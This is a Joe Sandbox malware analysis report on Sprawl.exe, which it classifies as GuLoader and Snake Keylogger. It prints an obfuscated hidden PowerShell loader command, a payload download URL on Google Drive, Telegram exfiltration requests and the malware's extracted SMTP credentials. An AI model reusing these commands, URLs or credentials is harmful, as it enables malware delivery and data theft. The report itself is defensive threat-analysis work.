Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Sprawl.exe

Overview

General Information

Sample name:Sprawl.exe
Analysis ID:1539387
MD5:47fd98348b7d314e4e9dae46e5f1e1a1
SHA1:cafe48404707e61235bfbe6646d8072af4298e21
SHA256:125b4582b7dd2221044fb257f580da57e4dc61b03a6c35e208fed973f71c28a1
Tags:exevipkeyloggeruser-malwarelabnet
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Sprawl.exe (PID: 2836 cmdline: "C:\Users\user\Desktop\Sprawl.exe" MD5: 47FD98348B7D314E4E9DAE46E5F1E1A1)
    • powershell.exe (PID: 2524 cmdline: "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 4460 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • powershell.exe (PID: 3796 cmdline: "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 3212 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "transjcama@comercialkmag.com", "Password": "pW@4G()=#2", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000004.00000002.2855794933.000000000B95D000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000002.00000002.2786477517.000000000B78B000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000009.00000002.3378186894.0000000022911000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          00000008.00000002.3358316175.0000000005B30000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 5 entries

            System Summary

            barindex
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.184.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3212, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49986
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2524, TargetFilename: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Agog\Smriti\Sprawl.exe
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 213.165.67.102, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 4460, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 50027
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)", CommandLine: "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Sprawl.exe", ParentImage: C:\Users\user\Desktop\Sprawl.exe, ParentProcessId: 2836, ParentProcessName: Sprawl.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Sensitometer42=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Paraffinerer.Dej';$Loveliest=$Sensitometer42.SubString(55162,3);.$Loveliest($Sensitometer42)", ProcessId: 2524, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-22T16:12:05.444916+020028033053Unknown Traffic192.168.2.649993188.114.97.3443TCP
            2024-10-22T16:12:06.804302+020028033053Unknown Traffic192.168.2.649996188.114.97.3443TCP
            2024-10-22T16:12:17.408699+020028033053Unknown Traffic192.168.2.650021188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-22T16:12:01.180935+020028032742Potentially Bad Traffic192.168.2.649990193.122.6.16880TCP
            2024-10-22T16:12:04.537983+020028032742Potentially Bad Traffic192.168.2.649991193.122.6.16880TCP
            2024-10-22T16:12:04.725700+020028032742Potentially Bad Traffic192.168.2.649990193.122.6.16880TCP
            2024-10-22T16:12:06.084842+020028032742Potentially Bad Traffic192.168.2.649991193.122.6.16880TCP
            2024-10-22T16:12:06.475477+020028032742Potentially Bad Traffic192.168.2.649995193.122.6.16880TCP
            2024-10-22T16:12:07.709864+020028032742Potentially Bad Traffic192.168.2.649998193.122.6.16880TCP
            2024-10-22T16:12:08.100608+020028032742Potentially Bad Traffic192.168.2.649999193.122.6.16880TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-22T16:11:53.877008+020028032702Potentially Bad Traffic192.168.2.649987142.250.184.238443TCP
            2024-10-22T16:11:53.895201+020028032702Potentially Bad Traffic192.168.2.649986142.250.184.238443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000008.00000002.3378029055.0000000021DF1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "transjcama@comercialkmag.com", "Password": "pW@4G()=#2", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
            Source: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Agog\Smriti\Sprawl.exeReversingLabs: Detection: 42%
            Source: Sprawl.exeReversingLabs: Detection: 42%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Sprawl.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49992 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 192.168.2.6:49992 -> 188.114.97.3:443 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49994 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:49987 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.6:49986 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49988 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.6:49989 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:50023 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:50025 version: TLS 1.2
            Source: Sprawl.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: e.pdb source: powershell.exe, 00000002.00000002.2754688897.0000000007553000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: qm.Core.pdb source: powershell.exe, 00000004.00000002.2832741780.0000000008951000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.2754688897.0000000007553000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Sprawl.exeCode function: 0_2_00406033 FindFirstFileA,FindClose,0_2_00406033
            Source: C:\Users\user\Desktop\Sprawl.exeCode function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055D1
            Source: C:\Users\user\Desktop\Sprawl.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21CEF45Dh8_2_21CEF2C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21CEF45Dh8_2_21CEF4AC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 21CEFC19h8_2_21CEF974
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0323F45Dh9_2_0323F2C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0323F45Dh9_2_0323F4AC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 0323FC19h9_2_0323F961
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256A31E0h9_2_256A2DC8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256ACF49h9_2_256ACCA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256A2C19h9_2_256A2968
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256AD7F9h9_2_256AD550
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256A31E0h9_2_256A2DB8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256AF209h9_2_256AEF60
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_256A0673
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256AE0A9h9_2_256ADE00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256AE959h9_2_256AE6B0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256A31E0h9_2_256A310E
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256ADC51h9_2_256AD9A8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_256A0040
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_256A0853
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256AFAB9h9_2_256AF810
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256AD3A1h9_2_256AD0F8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256A0D0Dh9_2_256A0B30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256A1697h9_2_256A0B30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256AEDB1h9_2_256AEB08
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256AF661h9_2_256AF3B8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 256AE501h9_2_256AE258

            Networking

            barindex
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficTCP traffic: 192.168.2.6:50027 -> 213.165.67.102:587
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2023/10/2024%20/%2001:23:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2023/10/2024%20/%2001:23:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 213.165.67.102 213.165.67.102
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
            Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49998 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49990 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49995 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49999 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49991 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49986 -> 142.250.184.238:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49987 -> 142.250.184.238:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:50021 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49996 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49993 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.6:50027 -> 213.165.67.102:587
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49992 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 192.168.2.6:49992 -> 188.114.97.3:443 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49994 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1rPNxWKL8K9PUiAx5BBXPJ-bVegWrIRWE&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/173.254.250.76 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
